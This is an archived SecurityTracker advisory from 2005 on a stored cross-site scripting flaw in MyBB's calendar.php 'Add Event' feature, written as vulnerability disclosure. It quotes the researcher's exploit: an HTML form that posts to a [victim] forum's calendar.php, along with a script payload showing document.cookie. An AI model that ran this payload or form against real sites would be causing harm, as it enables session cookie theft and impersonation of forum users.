MyBB 'calendar.php' Input Validation Bug Permits Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1012808 |
|
SecurityTracker URL: http://securitytracker.com/id/1012808
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jan 7 2005
|
Impact:
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
|
Description:
vamp^ reported an input validation vulnerability in MyBB. A remote user can conduct cross-site scripting attacks.
The 'calendar.php' script's 'Add Event' function does not properly validate user-supplied input. A remote user can submit specially crafted input that, when viewed by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the MyBB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
|
Impact:
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the MyBB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.mybboard.com/ (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 07 Jan 2005 13:46:50 +0000
Subject: myBulletinBoard html injector
|
Advisory :
the problem in "calendar.php " in Add Event allow to attacker POST any HTML
Codes what inckude java script or evil code or add LAME words and you can
crash the calendar if you add simple java code in subject .
Exploit :
--- CUT HERE ---
<p align="center"><b><font face="Tahoma">remote HTML Injector </font>
<font face="Tahoma" size="2">myBulletinBoard</font></b></p>
<p align="left"><font face="Tahoma" size="-2"><b>Advisory :</b></font></p>
<p align="left"><font face="Tahoma" size="-2"><b>the problem in </b></font>
<font face="Tahoma" size="2"><b> "calendar.php " in Add Event
allow to attacker
POST any HTML Codes what inckude java script or evil code or add LAME words
and
you can crash the calendar if you add simple java code in subject
.</b></font></p>
<p align="left"><b><font face="Tahoma" size="2">By vamp^ -
<a href="mailto:h00x@hotmail.com">h00x@hotmail.com</a></font></b></p>
<p align="left"><b><font face="Tahoma">Crash Calendar - in subject input
</font>
<a name="top"><font face="Tahoma" size="-1">
<Script>javascript:alert(document.cookie)</Script></font></a></b></p>
<p align="left"><b><font face="Tahoma">inject java code - any body click
event
will appear javascript alert here you can get the cookie input
<h1>hi<h1> </font>
<a name="top"><font face="Tahoma" size="-1">
<Script>javascript:alert(document.cookie)</Script></font></a></b></p>
<p align="left"><b><font face="Tahoma">lame - input subject
<h1>Hacked<h1></font></b></p>
<p align="center"><b><font face="Tahoma" color="#FF0000"> Edit Victim
site
in source
</font></b></p>
<p> </p>
<!-- here edit site -->
<form action="http://[victim]/board/calendar.php" method="post">
<table cellspacing="0" cellpadding="0" border="0" width="98%"
class="tborder" align="center">
<tr>
<td class="tborder">
<table border="0" cellspacing="1" cellpadding="4" width="100%">
<tr>
<td colspan="2" width="100%" class="thead">
<p align="center"><b><font face="Tahoma" size="2">ADD HTML CODES IN
EVENT</font></b></td>
</tr>
<tr>
<td width="40%" class="trow1"><font face="Tahoma"><b>Date:</b></font></td>
<td width="60%" class="trow1">
<font face="Tahoma"><b>
<select name="month">
<option value="1" selected="selected">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<input type="text" name="day" size="2" maxlength="2" value="7"
/>
<select name="year">
<option value="2005" selected="selected">2005</option>
<option value="2006">2006</option>
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
</select> </b></font>
</td>
</tr>
<tr>
<td width="40%" class="trow2"><font face="Tahoma"><b>Subject: input HTML
CODE</b></font></td>
<td width="60%" class="trow2"><font face="Tahoma"><b><input type="text"
size="50" name="subject" /></b></font></td>
</tr>
<tr>
<td valign="top" width="40%" class="trow1"><font
face="Tahoma"><b>Description:</b></font></td>
<td width="60%" class="trow1"><font face="Tahoma"><b><textarea cols="50"
rows="10" name="description"></textarea></b></font></td>
</tr>
</table>
</td>
</tr>
</table>
<p align="center">
<font face="Tahoma"><b>greets : B-Hunter , NT-ADMIN , Warur , C0NiK , S4A
ALL<br />
<input type="hidden" name="action" value="do_addevent" />
</b></font>
</p>
<div align="center">
<font face="Tahoma"><b>
<input type="submit" value="Submit" /> <input type="reset"
value="Reset" />
</b></font>
</div>
</form>
--- CUT HERE ---
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
|
|
